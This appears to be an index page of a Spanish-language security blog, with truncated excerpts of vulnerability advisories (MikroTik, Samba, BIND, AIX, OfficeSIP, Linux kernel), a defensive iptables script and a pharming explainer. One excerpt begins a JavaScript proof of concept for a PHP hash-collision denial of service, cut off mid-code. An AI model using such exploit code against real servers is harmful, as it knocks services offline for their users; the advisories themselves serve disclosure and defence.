Denegacion de Servicio en Router MIKROTIK
La denegación de servicio, sucede en el servicio de mikrotik router winbox cuando el atacante está continuamente solicitando una parte de un archivo plugin/dll, por lo que el servicio se vuelve inestable causando a todos los clientes remotos (con winbox) desconexion y negando volver aceptar más conexiones. Esto ocurre durante unos 5 minutos. Después de los 5 minutos, winbox es estable […]
Leer masVulnerabilidad en el servicio Samba afecta BlackBerry PlayBook
Existe una vulnerabilidad de ejecución remota de código en el servicio Samba que se entrega con el servicio de BlackBerry PlayBook para compartir archivos. El servicio de Samba es parte de un pack de software de código abierto utilizado para compartir archivos entre la tableta y un ordenador central. Un atacante remoto podría aprovechar la […]
Leer masBloquear escaneos de nmap con iptables y packet filter
Requerimientos iptables packet filter #!/bin/bash #===================== # Habilitamos ip forward #——————— echo 1 > /proc/sys/net/ipv4/ip_forward #===================== # hacemos un flush #——————— /sbin/iptables -F /sbin/iptables -t nat -F #===================== # empezamos el bloqueo #——————— /sbin/iptables -t filter -A INPUT -p TCP -m state –state RELATED,ESTABLISHED -j ACCEPT /sbin/iptables -t filter -A INPUT -p UDP -m state […]
Leer masQue es el pharming?
Bueno como saben y sabemos algunos, el ataque pharming no es un ataque o explotacion nueva, al contrario ya tiene pocos años atras que vino a reemplazar al casi obsoleto pishing, pero veamos que es el pharming segun wikipedia. Pharming es la explotación de una vulnerabilidad en el software de los servidores DNS (Domain Name System) o en […]
Leer masFallo en BIND permite que los dominios no se borren nunca de las cachés
Se ha publicado un fallo en el sistema de actualización de caché en servidores BIND 9.x. Un atacante podría tener acceso a los datos de un dominio cuyos datos han sido borrados. BIND es un servidor DNS que fue desarrollado a principios de los 80 por cuatro universitarios de la Universidad de Berkely (California). Más adelante, el desarrollo […]
Leer masEl ‘malware’ en Android ha aumentado un 472%
La cantidad de aplicaciones con contenido malicioso en Android ha crecido un 472 por ciento de julio a septiembre de 2011, lo que supone un aumento del 400 por ciento desde 2009 hasta el verano de 2010. Además, el número de dispositivos Android infectados con ‘malware’ en el mes de octubre de 2011 aumentó un […]
Leer mas“Kernel panic” en IBM AIX con solo enviar paquetes TCP
IBM ha publicado una actualización para solucionar una vulnerabilidad en la implementación TCP de su sistema operativo AIX en las versiones 5, 6 y 7 El fallo permitiría a un atacante provocar un “kernel panic” con solo enviar un paquete a la interfaz de red. Una especie de “ping de la muerte” con protocolo TCP. AIX (Advanced Interactive eXecutive) […]
Leer masVulnerabilidad en OfficeSIP, Denegacion de Servicio
La vulnerabilidad se debe a una validación incorrecta de SIP/SIPS en el “To” del encabezado de la solicitud, que permite a atacantes remotos causar una denegación de servicio Impacto: Una explotación exitosa podría permitir a un atacante hacer caer el servicio. Software afectado: OfficeSIP Server 3.1 Probado en: OfficeSIP Server 3.1 sobre Windows XP SP2 & SP3 Windows 7. […]
Leer masVulnerabilidad critica en php (REMOTA)
// Prueba de concepto function createEvilObj () { var evil_obj = {}; for (var i = 0; i < 1001; i++) { evil_obj[i] = 1; } evil_obj[‘kill[]’] = ‘kill’; return evil_obj;} // Serialize Javascript object into POST datafunction serializeObj (obj) { var str = []; for(var p in obj) { str.push(p + “=” + obj[p]); } return str.join(“&”);} // Run attackfunction attackSite () { var bad = […]
Leer masElevación de privilegios en el kernel Linux y un exploit interesante
El pasado día 17 de enero, Linus Torvalds hizo un commit para corregir una elevación de privilegios en el kernel Linux 2.6 (CVE-2012-0056). El fallo fue descubierto por Jüri Aedla y según comenta Torvalds en el propio parche, se debe a una incorrecta comprobación de privilegios al abrir el /proc/#pid#/mem de un proceso. Este error no pasó desapercibido a […]
Leer mas